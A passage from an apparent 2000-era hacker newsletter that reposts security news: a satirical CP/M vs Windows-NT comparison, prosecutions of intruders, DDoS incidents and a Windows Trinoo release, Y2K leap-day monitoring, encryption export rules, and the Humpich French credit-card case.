      protection is much easier to configure and provides       much more 
      reliable protection. Windows-NT makes no use of hardware protection for 
      system files. 

      Microsoft likes to trumpet the fact that Windows-NT is certified by the 
      government for C3 security. What they leave out is that that was only for 
      a certain version of Windows-NT (which they no longer support) and a 
      certain hardware configuration (which had       no network card.) In the 
      real world, a typical Windows-NT installation would never come close to 
      getting C3 certification. 

      CP/M however could easily be certified. It has a very secure network 
      because it has no network capability. It also has set of keys that you can 
      press that return you to the "secure command server". (It's called the 
      reset button.) These are the big features of C3       security and CP/M 
      has them. The reason that it does not have C3 certification is that no one 
      wants to pay the big bucks to get it certified. 

      Conclusion: The security of CP/M is vastly superior to Windows-NT. 

      Stability

      As far as I know the CP/M system for my Kaypro has not needed an upgrade 
      or patch for the past ten years. Also the operating system has no reported 
      bugs that can crash it. It is small, simple and very stable. 

      During that time Microsoft has two major release of Window-NT, at least 5 
      service packs and is planning on replacing the system with a new version 
      next year. In addition to this there are a large number of bugs out there 
      that Microsoft has yet to fix. Many       companies reboot their 
      Windows-NT systems weekly to avoid system crashes that come when you leave 
      Windows-NT running for too long. 

      Conclusion: CP/M is much more stable than Windows-NT. 

      Cost of ownership

      You can probably pick up a Kaypro-II with CP/M, Word* and Calc* at a 
      garage sale for about $10. Or you can go to an auction site and pick one 
      up for about $100-$200. 

      On the other hand a Window-NT system in the configuration that Microsoft 
      likes to use for benchmarking will probably cost you about $100,000. This 
      includes the price of the hardware, software, and the cost of hiring a 
      team of Microsoft Engineers for three       months to tune your system for 
      optimal performance. 

      Conclusion: The cost of ownership of CP/M is much, much lower than 
      Windows-NT. 

      Customer Testimonials

      But let's talk about real world experience. CP/M has hundreds of customer 
      testimonials all describing how useful and easy to use this operating 
      system is, while Microsoft Windows-NT is only able to provide anecdotal 
      evidence. 

      Note: We are use the definition of these terms as defined by Microsoft 
      Marketing. 

            Customer Testimonials                               Stories about 
            how well the operating system works for the operating system you 
            like. Anecdotal Evidence Stories about how well the operating system 
            works for the operating system you don't like.

      
      Conclusion: Since CP/M has Customer Testimonials and Windows-NT has only 
      Anecdotal Evidence, we must conclude that CP/M is vastly better. 

      Conclusion

      These results show that in every comparison category that CP/M is at least 
      as good as Windows-NT and frequently outperform the Microsoft operating 
      system. 

      Another conclusion we can draw from this is that if you come up with the 
      answer, a good writer can come up with a question that produces the 
      desired result. Comparisons like this one should always be scrutinized for 
      relevance and bias before you put any faith       into them. 

      Coming soon, we will compare a Windows-NT system vs. a brick. I'm not going
      to give away the ending, but I'm going to bet that the brick will win. 
      
      @HWA 
      
      
81.0  HNN:Feb 24th:DigiAlmty Busted By Feds
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/      
       
      contributed by McIntyre 
      
      DigiAlmty (Ikenna Iffih), a 28-year-old Northeastern University student,
      has been charged with electronically breaking into the computer systems
      of NASA and the Pentagon. In April of 1999 DigiAlmty was charged with
      illegally gaining access to the systems of the Defense Logistics Agency
      and several commercial systems. Since then the case has been expanded
      and now includes intrusions of Northeastern, NASA and the pentagon.
      DigiAlmty has also been accused of illegally copying some files and
      destroying others. If found guilty, DigiAlmty could face up to ten years
      in prison and $250,000 in fines. U.S. Attorney Donald Stern said "All in
      all, the defendant used his home computer to leave a trail of cybercrime
      from coast to coast." (If this guy "left a trail from coast to coast"
      what took them so bloody long to drop the hammer?)
      
      DigiAlmty (Ikenna Iffih) was a member of the Northeastern Chapter of
      the Association for Computing Machinery. 
      
      
      
      Mirror of ACM Member Page
      http://www.attrition.org/~mcintyre/digi/www.ccs.neu.edu/groups/acm/members.html
      
      Mirror of DigiAlmty's Home Page at Northeastern
      http://www.attrition.org/~mcintyre/digi/www.ccs.neu.edu/home/ikiffih/
      
      
      Mirrors of DigiAlmty Defacements
      http://www.attrition.org/mirror/attrition/digia.html
      
      
      Agence France-Press - via Nando Times 
      http://www2.nando.net:80/noframes/story/0,2107,500172150-500222086-50105851-0,00.html
      
      
      Associated Press - via Boston Globe
      http://www.boston.com/dailynews/054/region/Hacker_faces_charges_in_NASA_a:.shtml
      
      
      Reuters - via Wired
      http://www.wired.com/news/technology/0,1282,34539,00.html
      
      
      
      Student Charged in Govt. Hack 
      Reuters 
      
      4:10 p.m. 23.Feb.2000 PST BOSTON -- A Northeastern University student was 
      charged Wednesday with hacking into federal government computers, 
      including systems at NASA and the Defense Department, in a coast-to-coast 
      attack on public and private Web sites and servers, authorities said. 

      If convicted Ikenna Iffih, 28, faces up to 10 years in prison and a 
      $250,000 fine. 

      U.S. Attorney Donald Stern said Iffih seized control of a NASA Web server 
      in Maryland last year and was able to read, delete, and alter files, as 
      well as intercept and save login names. 

      The compromised server did not contain any classified or sensitive 
      information, and was not involved with the command or control of 
      satellites, Stern said. 

      Using the NASA computer as a platform, Iffih allegedly attacked the 
      Interior Department's Web server, defacing the agency's Web page, 
      prosecutors said. 

      Prosecutors also said Iffih accessed a Defense Department computer, as 
      well as the Web site of an ISP in Washington state, where he "recklessly 
      caused damage" and caused a significant loss of business, prosecutors 
      said. 

      "All in all, the defendant used his home computer to leave a trail of 
      cybercrime from coast to coast," Stern said. 

      A spokeswoman in Stern's office said that there was no known motive for 
      Iffih's alleged hacking. 

      "A lot of these hackers seem to do it just to strut their cyber-prowess," 
      spokeswoman Samantha Martin said. 

      Prosecutors said Iffih was not connected with the high-profile wave of 
      hacking attacks on popular retail, news, and all-purpose Web sites earlier 
      this month. 
      
      @HWA
      
      
      @HWA
      
82.0  HNN:Feb 24th:ISPs Form Alliance To Prevent Attacks
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/      
       
      contributed by no0ne 
      
      A group of ISP's have joined forces with ICSA.net, an internet security
      firm, in an effort to prevent denial of service attacks like those that
      downed major web sites. They have created the Alliance for Internet
      Security to make sure that each other's systems and facilities are not
      used as agents to launch attacks against the other providers. Each
      member company must pledge to secure its own internal systems, add
      filtering technology to prevent spoofing, and provide support for
      others to do the same. Founding members include Cable One, Cable &
      Wireless, Digex, Global Crossing and its U.S. subsidiary Global Center,
      GTE Internetworking, Level(3), Road Runner, and Sprint.
      
      ZDNet
      http://www.zdnet.com/zdnn/stories/news/0,4586,2445261,00.html


      Web attacks? The ISPs strike back!

      Internet service providers band together to
      form a security alliance in hopes of avoiding
      another DoS debacle.

      By Robert Lemos, ZDNet News
      UPDATED February 24, 2000 9:53 AM PT 


      The battle for an attack-proof Web rages on.

      Eight Internet providers have teamed with Internet security
      firm ICSA.net in an alliance to prevent denial-of-service
      attacks like the ones that downed several major Web
      sites earlier this month.

      The nine founding members of the Alliance for Internet
      Security promise to adopt security measures that will not
      only make it difficult to attack their computers but, more
      importantly, prevent their systems from being used in an
      attack against others.

      "The members of the Alliance are coming forward to be
      part of the solution and demonstrate their commitment to
      the right thing on behalf of all of the Internet," said Peter
      Tippett, AIS chairman, in a statement.

      "The first step for each of us is to clean up our own
      backyards, ensuring that our systems cannot be used as
      attack agents."

      Starting Feb. 7 with Yahoo! (Nasdaq: YHOO), a series of
      attacks slowed or, in many cases, downed major Web
      sites when a deluge of meaningless data and spurious
      access requests were targeted at their servers by
      unknown attackers.

      By week's end, eBay (Nasdaq: EBAY), E*Trade (Nasdaq:
      EGRP), Buy.com (Nasdaq: BUYX), ZDNet (NYSE: ZDZ),
      CNN, Amazon.com (Nasdaq: AMZN), The Microsoft
      (Nasdaq: MSFT) Network and Excite joined Yahoo! as
      victims of what are known as distributed denial-of-service
      attacks.

      Lessons to be learned
      The lesson for Internet service providers? Individuals and
      businesses on the Internet must not only protect their
      own computers from attack but also make sure the
      systems aren't being used to attack others.

      Each member company must
      pledge to secure its own internal
      systems, add filtering
      technology to prevent "spoofing"
      or forging the source address of
      a piece of data, and provide
      support for others to do the
      same.

      Founding members include
      Cable One, Cable & Wireless,
      Digex, Global Crossing and its
      U.S. subsidiary Global Center,
      GTE Internetworking, Level(3),
      Road Runner, and Sprint.

      "All Internet users should assure that their own network is
      in order and that their ISP is doing the appropriate filtering
      on behalf of everyone," said Harris Schwartz, director of
      security for Time Warner's (NYSE: TWX) high-speed
      Internet provider, Road Runner.

      Broadband providers offering individuals and small
      businesses fast connections are quickly becoming a
      stomping ground for Web vandals looking for easy
      targets.

      Most customers security-challenged
      Most users of such services know little of how to secure
      their systems -- and as many as 10 percent of such
      systems are completely open to anyone on the network.

      Educating such users about their role in making the
      Internet secure should be a top priority, said Stephen E.
      Cross, director of Carnegie Mellon University's Software
      Engineering Institute, speaking Wednesday before the
      Congressional Joint Economic Committee.

      "Support programs that provide early training in security
      practices and appropriate use ... should be integrated into
      general education about computing," Cross said.

      Yet, for the most part, the AIS will continue to overlook
      users and instead focus on businesses.

      Users on their own
      "This is about companies that are Internet-connected
      companies," said Laurie Wagner, senior vice president of
      business development for ICSA.net.

      Wagner pointed out that the alliance first needs to
      concentrate on the 5,000 or so small Internet providers
      that may not know much about security.

      For now, users are on their own, she said. "ISPs are not
      being paid to be security consultants for their users."
      
      
      @HWA
      
83.0  HNN:Feb 24th:Proposed Y2hacK Ban Not Getting Support
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/ 
      
       
      contributed by no0ne 
      
      The proposed ban on the upcoming hacker con Y2hacK to be held in Israel
      is not gaining support. Speaking in a meeting of the Committee for
      Scientific and Technological Research and Development's Michael Eitan
      said that "canceling the conference would be a mistake, and a missed
      opportunity to learn from the hackers". The sentiment that "hackers are
      not always crackers" was also echoed in the meeting.(Glad that they
      understand that in Israel)
      
      
      Wired
      http://www.wired.com/news/politics/0,1283,34504,00.html
      
      
      Victory for Israel Hack Meet? 
      by Tania Hershman 
      
      1:55 p.m. 23.Feb.2000 PST 
      TEL AVIV  A proposed ban on the upcoming worldwide hacker conference
      to be held here is not gaining support and Y2hacK is likely to go on 
      as planned. 
      
      Michael Eitan said Tuesday during a meeting of the Knesset's Committee
      for Scientific and Technological Research and Development that canceling
      the conference would be a mistake -- and a missed opportunity to learn 
      from the hackers. 
      
      Last week, committee head Anat Maor wrote a letter to the attorney general
      calling for the worldwide hacker conference to be outlawed. 
      
      "It's absurd. [Hacking] is illegal in Israel and many other countries, 
      including the US," Maor said. "If there was going to be a conference of
      thieves, or a conference of men who beat their wives, how would you feel?
      You can't allow a conference that goes against the law." 
      
      The attorney general has yet to respond. 
      
      "It's a pity she didn't consult with me about the letter she sent to the
      attorney general," said the Knesset's Eitan, addressing a crowd that included
      representatives from Israel's largest ISP, Netvision, the Israel Chapter of 
      the Internet Society, and security software company Aladdin, as well as 
      politicians and lawyers from the Israeli Bar Association. 
      
      Opinions offered at the meeting were overwhelmingly in favor of allowing 
      the conference for the sake of freedom of expression. Several participants
      also emphasized that hackers are not always crackers. 
      
      To illuminate the difference, colorful comparisons were drawn between the 
      criminal who sees an unlocked car and steals it and the concerned citizen 
      who leaves a note in the car informing the driver that it's unlocked. 
      Maor acknowledged at the meeting that her initial outrage regarding Y2hacK
      may have been a little hasty. 
      
      Although she was not being invited to the committee meeting, Shem Shaul,
      a UNIX specialist and journalist who got her first job in journalism by 
      hacking into Israel's Globes news site, was pleased with the tone of the
      meeting. 
      
      "I talked to Michael Eitan last night and explained some technical and 
      ethical issues," Shaul said. "He knows me from the university and from 
      journalism and he was very open. [Anat Maor] seemed to understand what 
      a mistake she had made, and reached a better conclusion." 
      
      Shaul and the Y2hacK team had sent Maor an official response to her
      letter to the attorney general. 
      
      "A lot of these so-called hackers grow up to be the visionaries and 
      founders of the Israeli ever-expanding hi-tech industry. President 
      Clinton has realized that, and hired a hacker to advise on the security
      of the White House," the letter stated. 
      
      Several messages on the Y2hacK site's bulletin board reiterated support
      for the conference. 
      
      "This whole situation could've been avoided had Anat looked at the list
      of lectures," Cyphunk wrote. "The subjects being covered are very important
      for system administrators and other 'security professionals'. [I] imagine 
      that what happened was Anat heard the word 'hacker' and started to fume." 

      
      
      
      @HWA
       
      
       
      
84.0  HNN:Feb 24th:Microsoft Web Sites Attacked
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/      
       
      contributed by Weld Pond 
      
      Microsoft said that it was hit with a syn-flood attack last Tuesday
      morning. The attack slowed down website responsiveness between 3 and 7
      percent. No damage occurred and the no access into Microsoft Systems was
      gained. (And why is this news? This sort of thing happensall the
      time.)
      
      Reuters - via Excite
      http://news.excite.com/news/r/000223/20/tech-hackers-microsoft
      (404)
      
      @HWA
      
85.0  HNN:Feb 24th:New DDoS Tool Released
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
       
      contributed by William Knowles 
      
      A new Windows version of Trinoo has been released. This new version will
      make it much easier to launch distributed denial of service attacks
      similar to those that recently hit Yahoo, ZDnet, CNN and others.
      
      C|Net
      http://news.cnet.com/category/0-1005-200-1555637.html
      
     New hacker software could spread by email 
     By John Borland
     Staff Writer, CNET News.com
     February 23, 2000, 4:35 a.m. PT 

     A group of anonymous programmers has released a new version of the software 
     that shut down Yahoo and Amazon.com earlier this month--one that makes it 
     far easier to launch attacks, computer experts say. 

     The tools, a new version of a software package dubbed "Trinoo," could allow 
     attackers to infiltrate ordinary desktop computers though an 
     innocent-looking email attachment. These computers--particularly those 
     connected to high-speed Internet services--could then be used as unwitting 
     accomplices in assaults on other Web sites, security analysts say. 

     "(The previous attacks) took someone who knew what they were doing," Trend 
     Micro spokesman David Perry said. "This turns it into a kid-on-the-street 
     problem." 

     The release of these tools follows some of the highest-profile computer 
     attacks in the Web's history. Using a method dubbed "distributed denial of 
     service attacks," computer vandals successfully rendered Yahoo, Amazon, 
     eBay and a handful of other big Web sites paralyzed for hours at a time by 
     swamping them with a multitude of simultaneous attacks. 

                   The attacks have spurred law enforcement investigations 
                   around the globe, but the FBI has not reported any major 
                   breakthroughs in the case. 

                   Some speculation has centered on several individuals with 
                   hacker nicknames like "mafiaboy." Canadian authorities 
                   investigated an Internet service provider (ISP) last week 
                   that once hosted a "mafiaboy" hacker-related site. But 
                   Canadian police said today they had no progress to report in 
                   their investigation. 

     While no conclusive evidence has been released on exactly what tools were 
     used in the denial of service attacks, recent speculation has focused on 
     tools with names like Trinoo, Tribal Flood Network and Stacheldracht 
     (German for "barbed wire"). 

     These tools allow an attacker to place agents on "zombie" computers around 
     the world and then wake them up simultaneously to launch a crippling stream 
     of Web traffic at a target site. Security officials at the FBI and other 
     computer security agencies have been warning of the danger these tools pose 
     for several months and have provided software to help guard against their 
     use. 

     But the new version of Trinoo heightens the danger because it makes attacks 
     easier to launch. Because the new version can infiltrate Windows NT, 
     Windows 95 and Windows 96-based machines, far more computers are at risk of 
     becoming hosts. 

     The Windows version also allows the tools to be spread as apparently 
     innocuous email attachments, much like ordinary viruses. Computer security 
     experts say they haven't seen this happen yet, but that the Windows 
     platform makes it relatively easy to do. 

     "This does make (denial of service attacks) easier," said Elias Levy, chief 
     technical officer for SecurityFocus.com, a computer security Web site. "Not 
     that it required a lot of intelligence or skill before. But this does bring 
     it down another notch." 

     The new tools are largely a threat to users with always-on digital 
     subscriber line or cable modem connections, analysts said. 

     This kind of threat has been seen before with the Back Orifice software, 
     Levy noted. That package, once surreptitiously installed on a system, 
     allows an outside person to control the computer remotely. The Trinoo 
     package is geared more specifically for launching denial of service 
     attacks, however. 

     Most of the major anti-virus firms have already developed or are developing
     tools to scan for and remove the new Trinoo software. 
      
      
      @HWA
      
86.0  HNN:Feb 25th:NDB Hit by Cyber Vandals
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/      
       
      contributed by acopalyse 
      
      NDB, an online broker, was cut off for more than an hour yesterday
      because of what it said was an attack by computer vandals. National
      Discount Broker Group, based in Jersey City, said that the company had 
      taken precautionary measures in light of recent attacks but that they
      had clearly not worked. (Hmmmm, not a whole lot of technical
      information here, who knows what really happened.)
      
      New York Times
      http://www.nytimes.com/library/tech/00/02/biztech/articles/25hack.html
      (Pay to play..)
      
      @HWA 
      
87.0  HNN:Feb 25th:Y2K Leap Day
      ~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/ 
      
       
      contributed by Evil Wench 
      
      John Koskinen, President Clinton's Year 2000 Czar told reporters that
      the US and about a dozen other countries will work together to track any
      automated-system failures sparked by a leap day next week. Leap days
      occur only once every 400 years.  No major system failures are expected.
      Plans for the future of the state-of-the-art computer facility built for
      the Y2K rollover have not yet been announced.
      
      ZDNet
      http://www.zdnet.com/zdnn/stories/news/0,4586,2448220,00.html?chkpt=zdnntop
      
      Y2K alert ... again? Beware 'leap day'

      'A real issue we feel obligated to keep track
      of,' warns Clinton's Year 2000 technology
      whiz, as the U.S. and others gear up for
      possible Feb. 29 digital snafus.



      By Reuters 
      February 24, 2000 4:13 PM PT 


      The United States and about a dozen countries will
      work together to track any automated-system
      failures sparked by a leap day next week that
      occurs only once in 400 years, the U.S. government
      said Thursday. 

      "It's a real issue that we feel obligated to keep track of,"
      John Koskinen, President Clinton's chief aide for Year
      2000 technology problems, told reporters at a $50 million
      Y2K monitoring station. 
      Koskinen said he did not expect any major system
      failures, largely because organizations typically checked
      for leap-year compliance while troubleshooting for the
      so-called Y2K bug. 

      "If there are difficulties in many cases it will result in
      minor or modest glitches that can be remedied quickly if
      people catch it quickly," he said. 

      To keep tabs internationally, Koskinen will take part in
      scheduled conference calls every eight hours over a
      three-day period with national Y2K coordinators on the
      steering committee of the World Bank-funded
      International Y2K Cooperation Center. 

      This group includes Britain, Bulgaria, Chile, Gambia,
      Iceland, Japan, Mexico, Morocco, the Netherlands and
      South Korea. Australia and New Zealand have also been
      invited to take part because they can give early warning
      shortly after Feb. 29 dawns at the international date line. 

      Info center finds new purpose
      The $50 million information coordination center set up
      under White House auspices to track Y2K glitches will be
      operational from Feb. 28 to March 1. It will be staffed from
      7 a.m. to 9 p.m. by about 75 federal workers per shift,
      about half as many as for the century date change, when
      it ran around the clock. 

      The greatest leap-day risk is to custom software used for
      record keeping or billing, especially where the number of
      days is central to the process being carried out, such as
      computing interest, Koskinen said. 

      Unlike the Y2K issue -- where the use of only two digits
      to signify the year was standard practice (see ZDNet
      News' Y2K Special Report) -- the potential leap-year
      problem results from misunderstanding the rule for when
      an extra day is added to the calendar. 

      The three-step rule
      Under the little-known three-step rule, February picks up
      a 29th day in years divisible by 4 except when the year is
      divisible by 100 -- unless the year is divisible by 400. 

      Thus, the year 2000 is the first leap year of its kind since
      1600. The three-step rule was crafted for the calendar
      introduced by Pope Gregory XIII in 1582 to better
      synchronize with the cycle of the seasons. The years
      1700, 1800 and 1900 were not leap years. 

      Koskinen said previous testing found that some software
      programmers knew enough of the leap-year rule to get to
      its second step. That would mean they could have coded
      2000 as a normal year, in which February had 28 days,
      instead of the 29 required. 

      Koskinen, who chairs the President's Council on Year
      2000 Conversion, said he would brief journalists on any
      glitches at 2 p.m. Feb. 29 and March 1. 

      At the final briefing, he said he would announce White
      House plans for the future of the state-of-the-art computer
      systems built for the rollover watch post. 
      
      
      @HWA
      
88.0  HNN:Feb 25th:Bernstein Allowed to Post Snuffle
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
       
      contributed by Evil Wench 
      
      The Commerce Department has confirmed that the new encryption export
      policy does permit Daniel Bernstein to post his 'Snuffle' program to
      the web without obtaining an export license. Snuffle is a piece of
      strong encryption software that has been the subject of a free speech
      lawsuit.
      
      C|Net
      http://news.cnet.com/news/0-1005-200-1556935.html?tag=st.ne.1002.bgif.1005-200-1556935
      
      Professor allowed to post encryption program online 
      By Reuters Special to CNET News.com February 24, 2000, 11:00 a.m. PT 

      WASHINGTON--The United States will let a computer scientist put 
      instructions for writing a powerful computer data-scrambling program on 
      his Web site, but his high-profile lawsuit challenging U.S. export       
      restrictions on encryption may continue, his lawyer said today.

      President Clinton in January dramatically liberalized once-strict U.S. 
      export limits on encryption programs, which scramble information and 
      render it unreadable without a password or software "key." The changes 
      recognized that       encryption, used in everything from Web browsing 
      software to cellular telephones, has become essential for securing 
      e-commerce and global communications. 

                          The move also followed a May 6 decision by a 
                          three-judge panel of the U.S. Ninth Circuit Court of 
                          Appeals that the old rules barring University of 
                          Illinois professor Daniel Bernstein from posting 
                          instructions for                           his 
                          "Snuffle" program on the Internet were an 
                          unconstitutional violation of the scientist's freedom 
                          of speech. 

                          But in January, the full court asked the panel to 
                          reconsider the ruling in light of the new Clinton 
                          policy. 

                                        In a private advisory letter sent last 
                                        week, the Commerce Department confirmed 
                                        that the new encryption export policy 
                                        permitted Bernstein to post 
                                        instructions, called source code, for 
                                        his                                         
                                        program on the Internet for all to see. 
                                        Any other computer programmer could 
                                        easily compile the source code into a 
                                        functioning program. 

                                        "In light of the changes in licensing 
                                        and review requirements for publicly 
                                        available source code, the new 
                                        regulations do not interfere with his 
                                        planned activities as you have described 
                                        them,"                                         
                                        the Commerce Department letter said in 
                                        response to a letter from Bernstein's 
                                        lawyer. 

      Under the old rules, Bernstein had to obtain an export license for each 
      person who wanted to view his Web site from outside the United States--an 
      impossible task given the Net's global reach. But the new rules allow 
      anyone to post       encryption source code on the Internet as long as 
      they also send a copy to the government and do not charge royalties for 
      use of the code. 

      "We are still considering our options," said Cindy Cohn, Bernstein's 
      lawyer. Cohn said the Commerce Department letter failed to clear up some 
      questions about the new rules. 

      The department did make it clear that a Web site that merely picked up 
      code posted by someone else, a practice known as mirroring, would not be 
      held responsible for following the export rules. And Bernstein or others 
      would not have       to notify the government again each time they posted 
      bug fixes or updates. 

      Bernstein's lawsuit came about because under the old rules, a book 
      containing computer source code could be shipped out of the United States 
      without restriction, but the same source code posted on the Internet or 
      put on a floppy       disk could not be "exported" without a license. 

      
      
      @HWA
      
89.0  HNN:Feb 26th:FBI Hit with DOS
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
       
      contributed by hantai and William Knowles
      
      The FBI has acknowledged that their web site was hit with a denial of
      service attack which forced it off line for several hours on the 18th.
      Unfortunately there are almost no technical details in this
      article.
      
      Associated Press - via San Jose Mercury News
      http://www.sjmercury.com/svtech/news/breaking/ap/docs/252799l.htm
      
      FBI admits its site was attacked

      BY TED BRIDIS AP Technology Writer 

      WASHINGTON (AP) -- The FBI acknowledged Friday that electronic vandals 
      shut down its own Internet site for hours last week in the       same type 
      of attack that disrupted some of the Web's major commercial sites.

      The bureau's Web site, www.fbi.gov, remained inaccessible for more than 
      three hours Feb. 18 because vandals overwhelmed it by       transmitting 
      spurious signals.

      ``The FBI has made comments they're going to find who's responsible for 
      the latest attacks, so it's a bit of war between the hackers and the       
      bureau,'' said James Williams, a Chicago lawyer and former FBI agent who 
      specialized in investigating computer crimes.

      The technique, which doesn't require particular sophistication, is similar 
      to repeatedly dialing a phone number to block all other incoming calls. 
      Last year, the FBI pulled down its World Wide Web site for       days 
      after hackers overwhelmed it using the same type of attack.

      No one has claimed responsibility for launching last week's attack against 
      the same law enforcement agency that is investigating serious disruptions 
      earlier this month at Yahoo!, eBay, ETrade, Amazon.Com       and others.

      ``Pretty much anyone is a target,'' agreed John McGowan, a research 
      engineer at ICSA.Net, a computer security firm. He wasn't surprised no one 
      has claimed credit.

      ``I don't think I'd want to go around bragging that it was my group that 
      shut down the FBI,'' McGowan said. ``They're certainly turning up the 
      carpets and looking for anything they can find.''

      The FBI said last week that it couldn't determine whether the problem was 
      a technical fault or malicious attack, but a spokeswoman, Deborah 
      Weierman, confirmed Friday that vandals were responsible.       She 
      declined to say whether there was any evidence, other than the coincidence 
      in timing, to link last week's attack against the FBI to those against 
      other Web sites.

      The FBI noted that its computers weren't broken into, and that its 
      affected Internet site is separate from all its internal systems, 
      including investigative files. ``We have had no more problems since 
      then,''       Weierman said.

      Engineers at IBM, who run the FBI's Internet site under a federal 
      contract, ``took the appropriate steps to get our Web site back and 
      running (and) continue to look into remedies and actions to minimize
      this from happening again,'' Weierman said. (PROFILE (CO:Amazon.com Inc; TS:AMZN; IG:RTS;) )


      
      
      @HWA
      
90.0  HNN:Feb 26th:Police Monitor 170,000 Pay Phone Calls
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/      
       
      contributed by indie slide 
      
      This article deals mostly with how a major player inside the Canadian
      Mafia was tracked down and arrested. The interesting part is the
      explanation of his arrest in which the police traced his fingerprints
      from a thrown away prepaid calling card. The article goes on to say how
      the police monitored the outgoing phone calls from 85 separate pay
      phones (a total of 170,000 calls) from businesses and malls he was known
      to visit in order to trap any calls he placed. (That's a lot of
      calls, wonder how many personal calls were accidentally listened
      to?)
      
      National Post
      http://www.nationalpost.com/home.asp?f=000226/217309
      
      
      
      @HWA 
      
       
      
91.0  HNN:Feb 26th:Echelon on 60 Minutes
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/      
       
      contributed by Weld Pond 
      
      An interview with former spy Mike Frost appeared on 60 Minutes Sunday
      night. The interview covered the NSA's involvement with the global spy
      netowork known as Echelon. In traditional intelligence agency spin
      control, the NSA has issued a letter about the show to congress.
      
      CBS
      http://cbsnews.cbs.com/now/section/0%2C1636%2C3415-412%2C00.shtml
      
      
      NSA letter to Congress
      http://www.fas.org/sgp/news/2000/02/nsalet.html
      
      (Contains graphics) check url for article with diagrams.

      
      
      @HWA
      
92.0  HNN:Feb 26th:French Smart Card Researcher Sentenced
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/      
       
      contributed by acopalyse 
      
      Serge Humpich, the 36 year-old engineer who discovered flaws in the
      chip-based security of French credit cards, has been sentenced to a
      suspended prison sentence of 10 months, 12,000 francs (approx. 1,200) in
      fines, and one symbolic franc in damages to the Groupement des Cartes
      Bancaires. After he had discovered significant flaws in the
      authentication system of French credit cards he attempted to sell the
      information to the Banks, who in turn conspired to have him arrested.
      (Instead of fixing the problem have the guy arrested, great
      strategy.)
      
      The Register UK
      http://www.theregister.co.uk/000226-000001.html
      
      The Liberation - French
      http://www.liberation.fr/quotidien/semaine/20000226sams.html
      
      
      
      Register;
      
      SATURDAY MARCH 11TH 2000  
      
      Posted 26/02/2000 8:41am by Cedric Ingrand

      French credit card hacker convicted

      Serge Humpich, the 36 year-old engineer who discovered flaws in the 
      chip-based security of French credit cards, was sentenced yesterday in 
      Paris. 

      Under the ruling issued by the 13th correctional chamber, he was sentenced 
      to a suspended prison sentence of 10 months, 12,000 francs (approx. 
      1,200) in fines, and one symbolic franc in damages to the Groupement des 
      Cartes Bancaires. His computer equipment has been seized, as well as the 
      document that he had filed with the INPI (Frances patents and trademarks 
      office), detailing his findings. 

      Humpich began studying credit card security four years ago. When he 
      discovered significant flaws in the authentication system, he contacted 
      the Groupement des Cartes Bancaires, through lawyers, to negotiate a 
      "technology transfer" of his discovery, for an undisclosed amount 
      (estimates of up to 20M were never confirmed by either party). 

      During Court hearings held on January 21 it was revealed that Humpich had 
      committed only one fraud (when he bought metro tickets using cards he 
      made), performed at the instigation of the GCB, and using the blank cards 
      that it had supplied. 

      Little did he know that the GCB had already contacted the authorities, and 
      that his phone was tapped. Humpich was later arrested, his equipment 
      seized, and his house (as well as his lawyers offices) raided by police. 

      Inventing the 57 franc note       "My intention was always to negotiate 
      the results of my invention", Humpich told The Register. "My mistake was 
      dealing with such a formidable opponent. Had I not been duped about their 
      true intentions, no one would have ever heard a word about the whole 
      thing." 

      Convicted for "counterfeiting credit cards", Humpich doesnt consider his 
      work forgery. "It's just as if I'd designed a perfect 57 francs bill," 
      Humpich smiles. 

      Although his conviction validates his findings in a way, he is quick to 
      correct that the cards he manufactured were not copies of existing cards, 
      but rather spoof cards that could fool point-of-sale terminals (i.e. not 
      hardwired into the banks computers), which would deem the doctored cards 
      valid. 

      Understandably reluctant to go into too much detail, Humpich does 
      acknowledge that the cards he made could have arbitrary numbers, and be 
      used with any four-digit PIN code. 

      At the heart of the case lies the crypto authentication algorithm used by 
      the cards, that relies on a 96 digit key computed from a 321 bit public 
      key. Part of Humpichs breakthrough was the factoring of that public key. 
      Evidence has come up that the system in use in most cards today was deemed 
      unsafe by experts as far back as 1988. 

      Documents backing the claim have been posted on a website 
      (www.humpich.com) hosted by supporters of Humpich. According to the 
      documents, the 96 digit key standard dates back to the original 1983 
      design, and was never upgraded to keep up with computing power. 
      Apparently, French banks need a serious refresher course on Moores law. 

      Another fine mess       Chip cards have been implemented in French credit 
      cards since 1992. In a classic case of security through obscurity, GCB 
      wont discuss the specifics of credit card security, staunchly defending 
      the official line that "chip cards are the safest around, with tremendous 
      benefits on fraud statistics." However, in a recent interview, the GCB 
      stated that a long, hard low-tech look at the hologram imprinted in the 
      cards, was the best way for a retailer to check a cards validity. 

      Retrofitting POS terminals to patch up security could cost banks as much 
      as 3 billion, according to some estimates. 

      ATM cash terminals, which only use the data stored on the cards magnetic 
      stripe for reasons of backwards compatibility with foreign (i.e. 
      chip-less) cards, are not prone to the flaws discovered by Humpich. 

      "Right now, a credit card is about as safe as a Post-It note," Humpich 
      says. "I have proved that their protection can be circumvented, and they 
      have yet to fix the flaws. But that would mean admitting that they were 
      negligent in the first place." 

      When asked if he thinks that others will pick up his work where he left 
      it, Humpich answers that it will be "much easier for them now that all 
      this is into the open. Some are really close to the solution now". 
      Already, anonymous messages on Usenet are providing details on the keys 
      used for credit card authentication. 

      The French credit card safety saga rumbles on, despite the Humpich's 
